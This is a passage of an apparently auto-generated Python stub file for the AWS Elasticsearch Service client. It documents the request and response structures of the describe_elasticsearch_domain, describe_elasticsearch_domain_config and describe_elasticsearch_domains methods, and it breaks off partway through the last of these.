'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomain`` request. Contains the status of the domain specified in the request.
- **DomainStatus** *(dict) --*
The current status of the Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions``
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain for which you want information.
:rtype: dict
:returns:
"""
pass
def describe_elasticsearch_domain_config(self, DomainName: str) -> Dict:
"""
Provides cluster configuration information about the specified Elasticsearch domain, such as the state, creation date, update version, and update date for cluster options.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomainConfig>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domain_config(
DomainName='string'
)
**Response Syntax**
::
{
'DomainConfig': {
'ElasticsearchVersion': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'ElasticsearchClusterConfig': {
'Options': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EBSOptions': {
'Options': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AccessPolicies': {
'Options': 'string',
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'SnapshotOptions': {
'Options': {
'AutomatedSnapshotStartHour': 123
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'VPCOptions': {
'Options': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'CognitoOptions': {
'Options': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'EncryptionAtRestOptions': {
'Options': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'NodeToNodeEncryptionOptions': {
'Options': {
'Enabled': True|False
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'AdvancedOptions': {
'Options': {
'string': 'string'
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
},
'LogPublishingOptions': {
'Options': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'Status': {
'CreationDate': datetime(2015, 1, 1),
'UpdateDate': datetime(2015, 1, 1),
'UpdateVersion': 123,
'State': 'RequiresIndexDocuments'|'Processing'|'Active',
'PendingDeletion': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomainConfig`` request. Contains the configuration information of the requested domain.
- **DomainConfig** *(dict) --*
The configuration information of the domain requested in the ``DescribeElasticsearchDomainConfig`` request.
- **ElasticsearchVersion** *(dict) --*
String of format X.Y to specify version for the Elasticsearch domain.
- **Options** *(string) --*
Specifies the Elasticsearch version for the specified Elasticsearch domain.
- **Status** *(dict) --*
Specifies the status of the Elasticsearch version options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **ElasticsearchClusterConfig** *(dict) --*
Specifies the ``ElasticsearchClusterConfig`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the cluster configuration for the specified Elasticsearch domain.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **Status** *(dict) --*
Specifies the status of the configuration for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EBSOptions** *(dict) --*
Specifies the ``EBSOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the EBS options for the specified Elasticsearch domain.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
- **Status** *(dict) --*
Specifies the status of the EBS options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AccessPolicies** *(dict) --*
IAM access policy as a JSON-formatted string.
- **Options** *(string) --*
The access policy configured for the Elasticsearch domain. Access policies may be resource-based, IP-based, or IAM-based. See `Configuring Access Policies <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-access-policies>`__ for more information.
- **Status** *(dict) --*
The status of the access policy for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **SnapshotOptions** *(dict) --*
Specifies the ``SnapshotOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the daily snapshot options specified for the Elasticsearch domain.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **Status** *(dict) --*
Specifies the status of a daily automated snapshot.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **Options** *(dict) --*
Specifies the VPC options for the specified Elasticsearch domain.
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **Status** *(dict) --*
Specifies the status of the VPC options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Options** *(dict) --*
Specifies the Cognito options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **Status** *(dict) --*
Specifies the status of the Cognito options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the ``EncryptionAtRestOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the Encryption At Rest options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **Status** *(dict) --*
Specifies the status of the Encryption At Rest options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the ``NodeToNodeEncryptionOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the node-to-node encryption options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **Status** *(dict) --*
Specifies the status of the node-to-node encryption options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AdvancedOptions** *(dict) --*
Specifies the ``AdvancedOptions`` for the domain. See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- **Options** *(dict) --*
Specifies the status of advanced options for the specified Elasticsearch domain.
- *(string) --*
- *(string) --*
- **Status** *(dict) --*
Specifies the status of ``OptionStatus`` for advanced options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- **Options** *(dict) --*
The log publishing options configured for the Elasticsearch domain.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
- **Status** *(dict) --*
The status of the log publishing options for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The Elasticsearch domain that you want to get information about.
:rtype: dict
:returns:
"""
pass
def describe_elasticsearch_domains(self, DomainNames: List) -> Dict:
"""
Returns domain configuration information about the specified Elasticsearch domains, including the domain ID, domain endpoint, and domain ARN.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomains>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domains(
DomainNames=[
'string',
]
)
**Response Syntax**
::
{
'DomainStatusList': [
{
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
